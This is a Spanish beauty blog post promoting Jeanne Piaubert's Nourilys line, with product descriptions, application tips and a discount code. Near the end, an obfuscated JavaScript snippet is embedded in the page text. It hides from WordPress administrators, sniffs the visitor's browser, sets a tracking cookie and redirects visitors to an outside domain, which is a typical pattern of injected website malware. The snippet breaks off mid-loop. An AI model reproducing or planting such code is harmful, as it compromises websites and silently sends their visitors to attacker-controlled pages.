comprar jeanne piaubert

Hoy venimos con un post en el que os presentamos algunas novedades de tratamiento facial y corporal.

Se trata la línea Nourilys de Jeanne Piaubert pero comencemos desde el principio y vamos a hablaros de la marca.

Jeanne Piaubert fue una de las primeras mujeres quinesiterapeutas de Francia, ingeniera química de formación abrió en 1928 su primer Instituto de Belleza, en 1937 inicia su técnica exclusiva de “rectificación de los senos sin operación”.

En la actualidad Jeanne Piaubert ha evolucionado al mismo tiempo que la ciencia pero su filosofía, sus principios y su originalidad han sabido mantenerse fieles al espíritu de su fundadora. Innovación, seriedad, rigor y eficacia son la fuerza son las premisas de Jeanne Piaubert.

Sus más de 80 años de experiencia han permitido a Jeanne Piaubert adquirir valiosos conocimientos y pericia para la creación de taratamientos, beneficiándose de las tecnologías cosméticas más avanzadas.

Como ya os anticipabamos de las últimas novedades de la marca es la línea Nourilys, especialmente pensada para trabajar la hidratación de nuestra piel, por lo que no se nos ocurre mejor momento para utilizarla.

 

Crema Hidratante Jeanne Piaubert Nourilys Crème Confort Nutri-Réparatrice Visage:

Crema hidratante nutritiva recomendada para pieles secas, nutre la piel desde el confort realizando una acción reparadora para las pieles más resentidas.

Su completa fórmula,  a base de aceites refinados y activos que permiten incrementar la cantidad de lípidos de la piel, la crema hidratante nutritiva NOURILYS nutre intensamente la epidermis. Sus activos específicos, el potente activo reparador CM-Glucan y el Maxnolia, conocido por sus propiedades calmantes, refuerzan la acción de la fórmula para ofrecer a la piel una nutrición y una suavidad intensas.

Modo de aplicación: Aplicar la crema por la mañana y/o por la noche en el rostro y el cuello perfectamente limpios. Si queremos una nutrición aún más profunda, os recomendamos utilizarlo conjuntamente con el Aceite NOURILYS del que os hablaremos a continuación.  jeanne-piaubert-nourilys-creme-confort-nutri-reparatrice-visage

 

 

 

 

 

 

 

 

 

 

 

Aceite Jeanne Piaubert Nourilys Huile Nutri-Réparatrice Visage:

Nos encontramos con un aceite facial nutritivo y reparador SOS que se convertirá en un  auténtico aliado contra las pieles muy secas, este aceite nos ayudará a reparar la barrera cutánea y aporta lípidos a la epidermis gracias a una combinación de activos específicos extremadamente nutritivos. Además, el Defensil®Plus repara la piel y permite reducir su sensibilidad frente a las agresiones externas para evitar las rojeces.

Modo de aplicación: Aplicaremos por la mañana y/o por la noche unas gotas del aceite nutritivo, solo o antes de la crema NOURILYS que os hablabamos anteriormente. Este aceite también puede aplicarse específicamente sobre las zonas muy secas. Truco: calienta el aceite en tus manos antes de aplicarlo a toquecitos sobre la piel.

comprar jeanne piaubert

 

 

 

 

 

 

 

 

 

 

 

Jeanne Piaubert Nourilys Baume Confort Hautement Nourrissant Corps:

La línea Nourilys se completa con un bálsamo corporal extremadamente rico que repara la barrera cutánea y permite que las distintas capas de la epidermis recuperen los lípidos que necesitan. Su activo específico, el Zanthalène®, calma la piel y le ofrece una agradable sensación de bienestar.

Modo de aplicación: Aplica diariamente tras la ducha o el baño en todo el cuerpo, insiste en las zonas más secas.

jeanne-piaubert-nourilys-baume-confort-hautement-nourrissant-corps

 

 

 

 

 

 

 

 

 

 

 

Si tenéis la piel muy seca ya no hay excusa para cuidarla y tenerla lista para este invierno.

Además hasta el 15 de noviembre con el código PRTRFA disfruta de un 5% de descuento en tus compras en tratamiento facial.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone